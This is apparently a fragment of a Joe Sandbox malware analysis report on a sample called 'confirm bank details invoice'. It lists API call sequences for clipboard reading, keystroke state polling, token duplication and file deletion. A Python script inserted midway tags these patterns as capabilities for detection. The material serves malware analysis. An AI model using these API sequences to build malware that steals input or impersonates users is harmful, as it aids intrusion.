                    • Instruction ID: 289ab1136e7531ee069c3c6f4742e8876263440c86d9cee0f9c58bda870e5a49
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: E6E09A7494010DAFDB10DFA4D5496AE7BB4EF04301F1005A1FD05A6691DA319A549A62
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 01341FF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 7fbf83c36c5ee5824f236a11526fc1a52c882b1bd79b16f9af86ff33988c4082
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: C8E0E67494010DDFDB00DFB4D5496AE7BF4EF04301F100161FD01E2281D6319D50DA72
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 004DF87D
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004DF8DC
                    • GetWindowLongW.USER32(?,000000F0), ref: 004DF919
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004DF940
                    • SendMessageW.USER32 ref: 004DF966
                    • _wcsncpy.LIBCMT ref: 004DF9D2
                    • GetKeyState.USER32(00000011), ref: 004DF9F3
                    • GetKeyState.USER32(00000009), ref: 004DFA00
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004DFA16
                    • GetKeyState.USER32(00000010), ref: 004DFA20
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004DFA4F
                    • SendMessageW.USER32 ref: 004DFA72
                    • SendMessageW.USER32(?,00001030,?,004DE059), ref: 004DFB6F
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 004DFB85
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004DFB96
                    • SetCapture.USER32(?), ref: 004DFB9F
                    • ClientToScreen.USER32(?,?), ref: 004DFC03
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004DFC0F
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 004DFC29
                    • ReleaseCapture.USER32 ref: 004DFC34
                    • GetCursorPos.USER32(?), ref: 004DFC69
                    • ScreenToClient.USER32(?,?), ref: 004DFC76
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004DFCD8
                    • SendMessageW.USER32 ref: 004DFD02
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004DFD41
                    • SendMessageW.USER32 ref: 004DFD6C
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004DFD84
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 004DFD8F
                    • GetCursorPos.USER32(?), ref: 004DFDB0
                    • ScreenToClient.USER32(?,?), ref: 004DFDBD
                    • GetParent.USER32(?), ref: 004DFDD9
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 004DFE3F
                    • SendMessageW.USER32 ref: 004DFE6F
                    • ClientToScreen.USER32(?,?), ref: 004DFEC5
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004DFEF1
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004DFF19
                    • SendMessageW.USER32 ref: 004DFF3C
                    • ClientToScreen.USER32(?,?), ref: 004DFF86
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004DFFB6
                    • GetWindowLongW.USER32(?,000000F0), ref: 004E004B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 2516578528-4164748364
                    • Opcode ID: 0ec9bce6a0200073915add669758d5783858191cfc35e25fcfbe87233af1b312
                    • Instruction ID: 76a224cd4d849c6fe3feecb94f12f0daacbc647138046e3d1ec33d42e03404aa
                    • Opcode Fuzzy Hash: 0ec9bce6a0200073915add669758d5783858191cfc35e25fcfbe87233af1b312
                    • Instruction Fuzzy Hash: 9F32DC70604640EFDB20DF64C894BAABBA5FF49348F04062BF696873A0C734DD59DB5A
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004DB1CD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: c9d74d92a1207640f5f45bd2f9831278ab79fceb7e1522b8c60aee2817e6a7e6
                    • Instruction ID: 573412202b15e3149f13030e09f02ceb29888fbffb5cd1b784cd22fa036152df
                    • Opcode Fuzzy Hash: c9d74d92a1207640f5f45bd2f9831278ab79fceb7e1522b8c60aee2817e6a7e6
                    • Instruction Fuzzy Hash: C112CD71900208ABEB249F64CC69FAF7BB5FF45710F10412BF919DA390DBB88902CB59
                    APIs
                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0048EB4A
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E3AEA
                    • IsIconic.USER32(000000FF), ref: 004E3AF3
                    • ShowWindow.USER32(000000FF,00000009), ref: 004E3B00
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3B0A
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004E3B20
                    • GetCurrentThreadId.KERNEL32 ref: 004E3B27
                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 004E3B33
                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004E3B44
                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004E3B4C
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 004E3B54
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3B57
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B6C
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B77
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B81
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B86
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B8F
                    • keybd_event.USER32(00000012,00000000), ref: 004E3B94
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B9E
                    • keybd_event.USER32(00000012,00000000), ref: 004E3BA3
                    • SetForegroundWindow.USER32(000000FF), ref: 004E3BA6
                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 004E3BCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: b6f2ec0d6bc8732d0990be2453535c65bb335616aec9f54d3f4d342a34fa9e54
                    • Instruction ID: 842782f151f543faba8efba9500dd5075ad5a424d881215ca453811844915aca
                    • Opcode Fuzzy Hash: b6f2ec0d6bc8732d0990be2453535c65bb335616aec9f54d3f4d342a34fa9e54
                    • Instruction Fuzzy Hash: 0231B271A40218BFEB216F728C49F7F3E6DEB44B51F104026FA05EB1D1C6B46D10EAA8
                    APIs
                      • Part of subcall function 004AB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004AB180
                      • Part of subcall function 004AB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
                      • Part of subcall function 004AB134: GetLastError.KERNEL32 ref: 004AB1BA
                    • _memset.LIBCMT ref: 004AAD08
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004AAD5A
                    • CloseHandle.KERNEL32(?), ref: 004AAD6B
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004AAD82
                    • GetProcessWindowStation.USER32 ref: 004AAD9B
                    • SetProcessWindowStation.USER32(00000000), ref: 004AADA5
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004AADBF
                      • Part of subcall function 004AAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004AACC0), ref: 004AAB99
                      • Part of subcall function 004AAB84: CloseHandle.KERNEL32(?,?,004AACC0), ref: 004AABAB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $H*R$default$winsta0
                    • API String ID: 2063423040-3454619666
                    • Opcode ID: f7d9094de181f73fc9620cde75727d5a1646daa70be4020df743ae75e9785afd
                    • Instruction ID: f831b1225cfa0c78c6781eb2dec85cd9ccc831d210de2449f68576b6ec87f785
                    • Opcode Fuzzy Hash: f7d9094de181f73fc9620cde75727d5a1646daa70be4020df743ae75e9785afd
                    • Instruction Fuzzy Hash: E081A171800209AFDF11DFA4CD45AEF7B79FF16308F04412AF914A62A1D7398E64DB6A
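The two listings above are capability evidence expressed purely as API sequences: the function at 004E3AEA pairs AttachThreadInput with SetForegroundWindow and a synthetic keybd_event of virtual key 0x12 (Alt), the usual way to defeat the foreground-lock and steal focus, and the function at 004AAD5A duplicates a token, opens winsta0 and the default desktop, which is what the report's "execute programs as a different user" signature is built on. The Sleep and GetFileAttributesW listings further up are also notable because their source region at 0133F000 is marked "based on PE: false", i.e. code running outside any mapped image. The following is an added example and is not part of this report or of Joe Sandbox's tooling: a Python script that parses API listings in the text form used on this page and tags each function with the capability its call sequence implies. The regular expressions, the rule names, and the embedded sample (trimmed, constructed copies of the listings above) are this example's own assumptions.

```python
"""Capability tagging for the per-function API listings of a Joe Sandbox report.

Added example, not part of the report or of Joe Sandbox: parses 'APIs' /
'Memory Dump Source' blocks in the text form shown on this page and tags
each function with the behaviour its call sequence implies. The rule set
and tag names are this example's own assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional

# Constructed sample: trimmed copies of three listings from this report
# (foreground forcing around 004E3Bxx, token/desktop handling around
# 004AADxx, and a Sleep call in the non-PE region at 0133F000).
SAMPLE = """\
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004E3AEA
• SetForegroundWindow.USER32(000000FF), ref: 004E3B0A
• GetCurrentThreadId.KERNEL32 ref: 004E3B27
• AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 004E3B44
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004E3B6C
• keybd_event.USER32(00000012,00000000), ref: 004E3B77
Memory Dump Source
• Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
APIs
  • Part of subcall function 004AB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004AB1AD
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004AAD5A
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004AAD82
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004AADBF
Memory Dump Source
• Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
APIs
• Sleep.KERNELBASE(000001F4), ref: 01341FF9
Memory Dump Source
• Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
"""

# One API entry: optional 'Part of subcall' prefix, Api.MODULE, optional
# argument list, then the call-site address after 'ref:'.
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SRC_RE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)"
)

VK_MENU = "00000012"  # virtual-key code for Alt, as the report prints keybd_event's first argument


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str]  # caller address when marked 'Part of subcall', else None


@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    source_file: str = ""
    offset: str = ""
    based_on_pe: Optional[bool] = None

    @property
    def apis(self) -> set:
        return {c.api for c in self.calls}


def parse_records(text: str) -> List[Record]:
    """Split the report text into one Record per 'APIs' block."""
    records: List[Record] = []
    current: Optional[Record] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = Record()
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            current.calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        m = SRC_RE.search(line)
        if m:
            current.source_file = m.group("file")
            current.offset = m.group("off")
            current.based_on_pe = m.group("pe") == "true"
    return records


# Rule set (assumption of this example): a tag applies when its predicate holds.
RULES: Dict[str, Callable[[Record], bool]] = {
    # AttachThreadInput + SetForegroundWindow + a synthetic Alt keypress
    "foreground-forcing": lambda r: (
        {"AttachThreadInput", "SetForegroundWindow", "keybd_event"} <= r.apis
        and any(c.api == "keybd_event" and c.args[:1] == [VK_MENU] for c in r.calls)
    ),
    # duplicated token plus explicit window station / desktop access
    "run-as-other-user": lambda r: (
        {"DuplicateTokenEx", "OpenWindowStationW", "OpenDesktopW"} <= r.apis
    ),
    # any API call issued from a region the sandbox could not map to a PE image
    "code-outside-pe-image": lambda r: r.based_on_pe is False and bool(r.calls),
}


def tag_functions(text: str) -> List[dict]:
    """Return one dict per function: first direct call address, region offset, and tags."""
    out = []
    for rec in parse_records(text):
        direct = [c for c in rec.calls if c.subcall_of is None]
        first = direct[0] if direct else (rec.calls[0] if rec.calls else None)
        out.append({
            "first_ref": first.ref if first else "",
            "offset": rec.offset,
            "based_on_pe": rec.based_on_pe,
            "tags": [name for name, pred in RULES.items() if pred(rec)],
        })
    return out


if __name__ == "__main__":
    for entry in tag_functions(SAMPLE):
        print(entry)
```

Subcall entries are kept in the record (they are real behaviour of the function) but excluded when picking the address that identifies it, so the reported `first_ref` is the function's own call site rather than a callee's.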
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,004B5FA6,?), ref: 004B6EF1
                      • Part of subcall function 004B725E: __wsplitpath.LIBCMT ref: 004B727B
                      • Part of subcall function 004B725E: __wsplitpath.LIBCMT ref: 004B728E
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • _wcscat.LIBCMT ref: 004B6149
                    • _wcscat.LIBCMT ref: 004B6167
                    • __wsplitpath.LIBCMT ref: 004B618E
                    • FindFirstFileW.KERNEL32(?,?), ref: 004B61A4
                    • _wcscpy.LIBCMT ref: 004B6209
                    • _wcscat.LIBCMT ref: 004B621C
                    • _wcscat.LIBCMT ref: 004B622F
                    • lstrcmpiW.KERNEL32(?,?), ref: 004B625D
                    • DeleteFileW.KERNEL32(?), ref: 004B626E
                    • MoveFileW.KERNEL32(?,?), ref: 004B6289
                    • MoveFileW.KERNEL32(?,?), ref: 004B6298
                    • CopyFileW.KERNEL32(?,?,00000000), ref: 004B62AD
                    • DeleteFileW.KERNEL32(?), ref: 004B62BE
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004B62E1
                    • FindClose.KERNEL32(00000000), ref: 004B62FD
                    • FindClose.KERNEL32(00000000), ref: 004B630B
                    Strings
                    Similarity
                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                    • String ID: \*.*
                    • API String ID: 1917200108-1173974218
                    APIs
                    • OpenClipboard.USER32(0050DC00), ref: 004C6B36
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 004C6B44
                    • GetClipboardData.USER32(0000000D), ref: 004C6B4C
                    • CloseClipboard.USER32 ref: 004C6B58
                    • GlobalLock.KERNEL32(00000000), ref: 004C6B74
                    • CloseClipboard.USER32 ref: 004C6B7E
                    • GlobalUnlock.KERNEL32(00000000), ref: 004C6B93
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 004C6BA0
                    • GetClipboardData.USER32(00000001), ref: 004C6BA8
                    • GlobalLock.KERNEL32(00000000), ref: 004C6BB5
                    • GlobalUnlock.KERNEL32(00000000), ref: 004C6BE9
                    • CloseClipboard.USER32 ref: 004C6CF6
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 004BF62B
                    • FindClose.KERNEL32(00000000), ref: 004BF67F
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004BF6A4
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004BF6BB
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004BF6E2
                    • __swprintf.LIBCMT ref: 004BF72E
                    • __swprintf.LIBCMT ref: 004BF767
                    • __swprintf.LIBCMT ref: 004BF7BB
                      • Part of subcall function 0049172B: __woutput_l.LIBCMT ref: 00491784
                    • __swprintf.LIBCMT ref: 004BF809
                    • __swprintf.LIBCMT ref: 004BF858
                    • __swprintf.LIBCMT ref: 004BF8A7
                    • __swprintf.LIBCMT ref: 004BF8F6
                    Strings
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 835046349-2428617273
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004C1B50
                    • _wcscmp.LIBCMT ref: 004C1B65
                    • _wcscmp.LIBCMT ref: 004C1B7C
                    • GetFileAttributesW.KERNEL32(?), ref: 004C1B8E
                    • SetFileAttributesW.KERNEL32(?,?), ref: 004C1BA8
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004C1BC0
                    • FindClose.KERNEL32(00000000), ref: 004C1BCB
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 004C1BE7
                    • _wcscmp.LIBCMT ref: 004C1C0E
                    • _wcscmp.LIBCMT ref: 004C1C25
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C1C37
                    • SetCurrentDirectoryW.KERNEL32(005239FC), ref: 004C1C55
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C1C5F
                    • FindClose.KERNEL32(00000000), ref: 004C1C6C
                    • FindClose.KERNEL32(00000000), ref: 004C1C7C
                    Strings
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004C1CAB
                    • _wcscmp.LIBCMT ref: 004C1CC0
                    • _wcscmp.LIBCMT ref: 004C1CD7
                      • Part of subcall function 004B6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004B6BEF
                    • FindNextFileW.KERNEL32(00000000,?), ref: 004C1D06
                    • FindClose.KERNEL32(00000000), ref: 004C1D11
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 004C1D2D
                    • _wcscmp.LIBCMT ref: 004C1D54
                    • _wcscmp.LIBCMT ref: 004C1D6B
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C1D7D
                    • SetCurrentDirectoryW.KERNEL32(005239FC), ref: 004C1D9B
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C1DA5
                    • FindClose.KERNEL32(00000000), ref: 004C1DB2
                    • FindClose.KERNEL32(00000000), ref: 004C1DC2
                    Strings
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    APIs
                    Strings
                    Similarity
                    • API ID: _memset
                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                    • API String ID: 2102423945-2023335898
                    APIs
                    • GetLocalTime.KERNEL32(?), ref: 004C09DF
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004C09EF
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004C09FB
                    • __wsplitpath.LIBCMT ref: 004C0A59
                    • _wcscat.LIBCMT ref: 004C0A71
                    • _wcscat.LIBCMT ref: 004C0A83
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C0A98
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0AAC
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0ADE
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004C0AFF
                    • _wcscpy.LIBCMT ref: 004C0B0B
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004C0B4A
                    Strings
                    Similarity
                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                    • String ID: *.*
                    • API String ID: 3566783562-438819550
                    APIs
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004AABD7
                      • Part of subcall function 004AABBB: GetLastError.KERNEL32(?,004AA69F,?,?,?), ref: 004AABE1
                      • Part of subcall function 004AABBB: GetProcessHeap.KERNEL32(00000008,?,?,004AA69F,?,?,?), ref: 004AABF0
                      • Part of subcall function 004AABBB: HeapAlloc.KERNEL32(00000000,?,004AA69F,?,?,?), ref: 004AABF7
                      • Part of subcall function 004AABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004AAC0E
                      • Part of subcall function 004AAC56: GetProcessHeap.KERNEL32(00000008,004AA6B5,00000000,00000000,?,004AA6B5,?), ref: 004AAC62
                      • Part of subcall function 004AAC56: HeapAlloc.KERNEL32(00000000,?,004AA6B5,?), ref: 004AAC69
                      • Part of subcall function 004AAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004AA6B5,?), ref: 004AAC7A
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004AA6D0
                    • _memset.LIBCMT ref: 004AA6E5
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004AA704
                    • GetLengthSid.ADVAPI32(?), ref: 004AA715
                    • GetAce.ADVAPI32(?,00000000,?), ref: 004AA752
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004AA76E
                    • GetLengthSid.ADVAPI32(?), ref: 004AA78B
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004AA79A
                    • HeapAlloc.KERNEL32(00000000), ref: 004AA7A1
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004AA7C2
                    • CopySid.ADVAPI32(00000000), ref: 004AA7C9
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004AA7FA
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004AA820
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004AA834
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    Strings
                    Similarity
                    • API ID:
                    • String ID: Q$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$QQQ Q
                    • API String ID: 0-2637990437
                    APIs
                      • Part of subcall function 004B6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,004B5FA6,?), ref: 004B6ED8
                      • Part of subcall function 004B72CB: GetFileAttributesW.KERNEL32(?,004B6019), ref: 004B72CC
                    • _wcscat.LIBCMT ref: 004B6441
                    • __wsplitpath.LIBCMT ref: 004B645F
                    • FindFirstFileW.KERNEL32(?,?), ref: 004B6474
                    • _wcscpy.LIBCMT ref: 004B64A3
                    • _wcscat.LIBCMT ref: 004B64B8
                    • _wcscat.LIBCMT ref: 004B64CA
                    • DeleteFileW.KERNEL32(?), ref: 004B64DA
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 004B64EB
                    • FindClose.KERNEL32(00000000), ref: 004B6506
                    Strings
                    Similarity
                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                    • String ID: \*.*
                    • API String ID: 2643075503-1173974218
                    APIs
                      • Part of subcall function 004D3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004D2BB5,?,?), ref: 004D3C1D
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004D328E
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 004D332D
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004D33C5
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004D3604
                    • RegCloseKey.ADVAPI32(00000000), ref: 004D3611
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    APIs
                    • GetKeyboardState.USER32(?), ref: 004B2B5F
                    • GetAsyncKeyState.USER32(000000A0), ref: 004B2BE0
                    • GetKeyState.USER32(000000A0), ref: 004B2BFB
                    • GetAsyncKeyState.USER32(000000A1), ref: 004B2C15
                    • GetKeyState.USER32(000000A1), ref: 004B2C2A
                    • GetAsyncKeyState.USER32(00000011), ref: 004B2C42
                    • GetKeyState.USER32(00000011), ref: 004B2C54
                    • GetAsyncKeyState.USER32(00000012), ref: 004B2C6C
                    • GetKeyState.USER32(00000012), ref: 004B2C7E
                    • GetAsyncKeyState.USER32(0000005B), ref: 004B2C96
                    • GetKeyState.USER32(0000005B), ref: 004B2CA8
                    Similarity
